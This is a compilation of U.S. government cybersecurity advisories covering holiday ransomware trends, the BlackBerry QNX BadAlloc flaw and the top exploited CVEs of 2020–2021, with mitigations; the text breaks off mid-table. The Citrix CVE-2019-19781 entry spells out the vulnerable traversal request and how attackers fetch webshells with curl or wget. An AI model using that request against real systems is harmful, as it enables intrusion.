Ransomware Awareness for Holidays and Weekends


Immediate Actions You Can Take Now to Protect Against Ransomware
• Make an offline backup of your data.
• Do not click on suspicious links.
• If you use RDP, secure and monitor it.
Update your OS and software.
• Use strong passwords.
Use multi-factor authentication.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends—when offices are normally closed—in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.

Click here for a PDF copy of this report.

Threat Overview

Recent Holiday Targeting

Cyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. Cyber criminals, however, may view holidays and weekends—especially holiday weekends—as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.

  • In May 2021, leading into Mother’s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim’s network, they deployed ransomware to encrypt victim data and—as a secondary form of extortion—exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.
  • In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.
  • In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations—including multiple managed service providers and their customers.

Ransomware Trends

The FBI’s Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime—a record number—from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020.
  The following ransomware variants have been the most frequently reported to FBI in attacks over the last month.

  • Conti
  • PYSA
  • LockBit
  • RansomEXX/Defray777
  • Zeppelin
  • Crysis/Dharma/Phobos

The destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA’s Fact Sheet: Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches.) Malicious actors have also added tactics, such as encrypting or deleting system backups—making restoration and recovery more difficult or infeasible for impacted organizations.

Although cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: 

  • Evaluate a victim’s ability to pay a ransom.
  • Evaluate a victim’s incentive to pay a ransom to: 
    • Regain access to their data and/or 
    • Avoid having their sensitive or proprietary data publicly leaked.
  • Gather information for follow-on attacks before deploying ransomware on the victim network.

Threat Hunting

The FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems. 

  • Understand the IT environment’s routine activity and architecture by establishing a baseline. By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network—and from what location—can assist in identifying anomalies. Understanding the baseline environment—including the normal internal and external traffic—can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.
  • Review data logs. Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include:
    • Numerous failed file modifications,
    • Increased CPU and disk activity,
    • Inability to access certain files, and
    • Unusual network communications.
  • Employ intrusion prevention systems and automated security alerting systems—such as security information event management software, intrusion detection systems, and endpoint detection and response.
  • Deploy honeytokens and alert on their usage to detect lateral movement.

Indicators of suspicious activity that threat hunters should look for include:

  • Unusual inbound and outbound network traffic,
  • Compromise of administrator privileges or escalation of the permissions on an account,
  • Theft of login and password credentials,
  • Substantial increase in database read volume,
  • Geographical irregularities in access and log in patterns,
  • Attempted user activity during anomalous logon times, 
  • Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and
  • Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

Cyber Hygiene Services

CISA offers a range of no-cost cyber hygiene services—including vulnerability scanning and ransomware readiness assessments—to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. 

Ransomware Best Practices

The FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to CISA, a local FBI field office, or by filing a report with IC3 at IC3.gov. Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. law, and share information to prevent future attacks.

Information Requested

Upon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: 

  • Recovered executable file(s),
  • Live memory (RAM) capture,
  • Images of infected systems,
  • Malware samples, and
  • Ransom note.

Recommended Mitigations

The FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends.
  Additionally, the FBI and CISA recommend identifying IT security employees to be available and “on call” during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.

Make an offline backup of your data.

  • Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.
  • Review your organization’s backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.

Do not click on suspicious links.

  • Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.

If you use RDP—or other potentially risky services—secure and monitor.

  • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.
  • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
  • Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Open document readers in protected viewing modes to help prevent active content from running.

Update your OS and software; scan for vulnerabilities.

  • Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers—as well as software processing internet data, such as web browsers, browser plugins, and document readers—for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.
  • Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.
  • Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA’s free services.)

Use strong passwords.

  • Ensure strong passwords and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.

Use multi-factor authentication.

  • Require multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. 

Secure your network(s): implement segmentation, filter traffic, and scan ports.

  • Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.
  • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
  • Scan network for open and listening ports and close those that are unnecessary.
  • For companies with employees working remotely, secure home networks—including computing, entertainment, and Internet of Things devices—to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. 

Secure your user accounts.

  • Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.
  • Regularly audit logs to ensure new accounts are legitimate users.

Have an incident response plan.

  • Create, maintain, and exercise a basic cyber incident response plan that:
    • Includes procedures for response and notification in a ransomware incident and
    • Plans for the possibility of critical systems being inaccessible for a period of time.

Note: for help with developing your plan, review available incident response guidance, such as the Public Power Cyber Incident Response Playbook and the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

If your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.

  • Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless.
  • Turn off other computers and devices. Power off and segregate (i.e., remove from the network) the infected computer(s). Power off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering off and segregating infected computers from computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.
  • Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.

Additional Resources

For additional resources related to the prevention and mitigation of ransomware, go to https://www.stopransomware.gov as well as the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide. Stopransomware.gov is the U.S. Government’s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:

Source…

BadAlloc Vulnerability Affecting BlackBerry QNX RTOS


On August 17, 2021, BlackBerry publicly disclosed that its QNX Real Time Operating System (RTOS) is affected by a BadAlloc vulnerability—CVE-2021-22156. BadAlloc is a collection of vulnerabilities affecting multiple RTOSs and supporting libraries.[1] A remote attacker could exploit CVE-2021-22156 to cause a denial-of-service condition or execute arbitrary code on affected devices.[2] BlackBerry QNX RTOS is used in a wide range of products whose compromise could result in a malicious actor gaining control of highly sensitive systems,  increasing risk to the Nation’s critical functions. Note: at this time, CISA is not aware of active exploitation of this vulnerability.

CISA strongly encourages critical infrastructure organizations and other organization developing, maintaining, supporting, or using affected QNX-based systems, to patch affected products as quickly as possible. Refer to the Mitigations section for more information about patching.

CVE-2021-22156 is an integer overflow vulnerability affecting the calloc() function in the C runtime library of multiple BlackBerry QNX products. Exploitation of this vulnerability could lead to a denial-of-service condition or arbitrary code execution in affected devices. To exploit this vulnerability, an attacker must have control over the parameters to a calloc() function call and the ability to control what memory is accessed after the allocation. An attacker with network access could remotely exploit this vulnerability if the vulnerable product is running and the affected device is exposed to the internet.[3]

CVE-2021-22156 is part of a collection of integer overflow vulnerabilities, known as BadAlloc, which affect a wide range of industries using Internet of Things (IoT), and operational technology (OT)/industrial control systems (ICS) devices. See CISA ICS Advisory ICSA-21-119-04 and Microsoft’s BadAlloc blog post for more information.

All BlackBerry programs with dependency on the C runtime library are affected by this vulnerability (see table 1 for a list of affected BlackBerry QNX products). Because many affected devices include safety-critical devices, exploitation of this vulnerability could result in a malicious actor gaining control of sensitive systems, possibly leading to increased risk of damage to infrastructure or critical functions.

Table 1: Affected BlackBerry QNX Products [4]
Product Affected Version
 QNX SDP  6.5.0SP1, 6.5.0,  6.4.1, 6.4.0
 QNX Momentics Development Suite  6.3.2
 QNX Momentics 6.3.0SP3, 6.3.0SP2, 6.3.0SP1, 6.3.0, 6.2.1b, 6.2.1, 6.2.1A, 6.2.0
 QNX Realtime Platform  6.1.0a, 6.1.0, 6.0.0a, 6.0.0
 QNX Cross Development Kit  6.0.0, 6.1.0
 QNX Development Kit (Self-hosted)  6.0.0, 6.1.0
 QNX Neutrino RTOS Safe Kernel  1.0
 QNX Neutrino RTOS Certified Plus  1.0
 QNX Neutrino RTOS for Medical Devices  1.0, 1.1
 QNX OS for Automotive Safety  1.0
 QNX OS for Safety  1.0, 1.0.1
 QNX Neutrino Secure Kernel  6.4.0, 6.5.0
 QNX CAR Development Platform  2.0RR

 

CISA strongly encourages critical infrastructure organizations and other organizations developing, maintaining, supporting, or using affected QNX-based systems to patch affected products as quickly as possible.

  • Manufacturers of products that incorporate vulnerable versions should contact BlackBerry to obtain the patch.
  • Manufacturers of products who develop unique versions of RTOS software should contact BlackBerry to obtain the patch code. Note: in some cases, manufacturers may need to develop and test their own software patches.
  • End users of safety-critical systems should contact the manufacturer of their product to obtain a patch. If a patch is available, users should apply the patch as soon as possible. If a patch is not available, users should apply the manufacturer’s recommended mitigation measures until the patch can be applied.
    • Note: installation of software updates for RTOS frequently may require taking the device out of service or to an off-site location for physical replacement of integrated memory.

Resources

Source…

Top Routinely Exploited Vulnerabilities | CISA


This Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom’s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). 

This advisory provides details on the top 30 vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021.  

Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. 

Click here for a PDF version of this report.

Key Findings

In 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.

Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organization to conduct rigorous patch management.

CISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. 

Table 1:Top Routinely Exploited CVEs in 2020

Vendor

CVE

Type

Citrix

CVE-2019-19781

arbitrary code execution

Pulse

CVE 2019-11510

arbitrary file reading

Fortinet

CVE 2018-13379

path traversal

F5- Big IP

CVE 2020-5902

remote code execution (RCE)

MobileIron

CVE 2020-15505

RCE

Microsoft

CVE-2017-11882

RCE

Atlassian

CVE-2019-11580

RCE

Drupal

CVE-2018-7600

RCE

Telerik

CVE 2019-18935

RCE

Microsoft

CVE-2019-0604

RCE

Microsoft

CVE-2020-0787

elevation of privilege

Netlogon

CVE-2020-1472

elevation of privilege

 

In 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.

CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. 

Organizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.

2020 CVEs

CISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE 2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[1][2][3] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis.CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix’s Application Delivery Controller (ADC)—a load balancing application for web, application, and database servers widely use throughout the United States.[4][5] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[6

Identified as emerging targets in early 2020,[7] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[8][9], in VPN services[10][11] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[12][13]

The CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and retain unauthorized credentials for all users on a compromised Pulse VPN server and can retain unauthorize access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[14][15][16][17]

2021 CVEs

In 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. 

  • Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 
    • See CISA’s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.
  • Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900
    • See CISA’s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.
  • Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104
    • See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.
  • VMware: CVE-2021-21985
    • See CISA’s Current Activity: Unpatched VMware vCenter Software for more information and guidance. 
  • Fortinet: CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 
    • See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. 

Mitigations and Indicators of Compromise

One of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. 

Focusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries’ operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. 

Additionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.

Tables 2–14 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. 

Note: The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE.
 

Table 2: CVE-2019-19781 Vulnerability Details

Citrix Netscaler Directory Traversal (CVE-2019-19781)

Vulnerability Description
Citrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. 

CVSS 3.02 

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

The lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request (POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g., curl, wget, Invoke-WebRequest) and gain unauthorized access to the OS. 

Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability.

Fix

Patch Available

Recommended Mitigations

  • Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).

Detection Methods

Vulnerable Technologies and Versions
Citrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0

References and Additional Guidance

 

Table 3: CVE 2019-11510 Vulnerability Details

 

Table 4: CVE 2018-13379 Vulnerability Details

 

Table 5: CVE-2020-5902 Vulnerability Details

F5 Big IP Traffic Management User Interface (CVE-2020-5902)

Vulnerability Description
The Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. 

CVSS 3.0
Critical

Vulnerability Discussion, IOCs, and Malware Campaigns
This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. 

Fix
Upgrade to Secure Versions Available
 

Recommended Mitigations
Download and install a fixed software version of the software from a vendor approved resource. If it is not possible to update quickly, restrict access via the following actions.

  • Address unauthenticated and authenticated attackers on self IPs by blocking all access.
  • Address unauthenticated attackers on management interface by restricting access. 
Detection Methods

Vulnerable Technologies and Versions
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable.

References

 

Table 6: CVE-2020-15505 Vulnerability Details

MobileIron Core & Connector (CVE-2020-15505)

Vulnerability Description

MobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.

Fix

Patch Available

Recommended Mitigations

  • Download and install a fixed software version of the software from a vendor approved resource.

Detection Methods

  • None. Manually check your software version to see if it is susceptible to this vulnerability. 

Vulnerable Technologies and Versions

MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable.

References

 

Table 7: CVE-2020-0688 Vulnerability Details

 

Table 8: CVE-2019-3396 Vulnerability Details

 

Table 9: CVE 2017-11882 Vulnerability Details

Microsoft Office Memory Corruption (CVE 2017-11882)

Vulnerability Description

Microsoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the “Microsoft Office Memory Corruption Vulnerability.” 

Cyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phasing campaigns, and it enables RCE on vulnerable systems.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns

Microsoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe, meaning it runs as its own process and can accept commands from other processes.

Data execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which eqnedt32.exe was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute an embedded attacker commands.

Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to deliver LokiBot malware.

Fix

Patch Available

Recommended Mitigations

Detection Methods

  • Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability.

Vulnerable Technologies and Versions

  • Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable.

References

 

Table 10: CVE 2019-11580 Vulnerability Details

Atlassian Crowd and Crowd Data Center Remote Code Execution (CVE 2019-11580)

Vulnerability Description

Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.

Fix

Patch Available

Recommended Mitigations

  • Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.
  • Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at https://www.atlassian.com/software/crowd/download.
  • Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at https://www.atlassian.com/software/crowd/download-archive.

Detection Methods

Vulnerable Technologies and Versions

All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

References

 

Table 11: CVE 2018-7600 Vulnerability Details

Drupal Core Multiple Remote Code Execution (CVE 2018-7600)

Vulnerability Description

Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

An RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.

Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining.

Fix

Patch Available

Recommended Mitigations

  • Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1.

Detection Methods

Vulnerable Technologies and Versions

  • Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected.

References

 

Table 12: CVE 2019-18935 Vulnerability Details

Telerik UI for ASP.NET AJAX Insecure Deserialization (CVE 2019-18935)

Vulnerability Description

Telerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to  remote code execution attacks on affected web servers due to a deserialization vulnerability.

CVS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

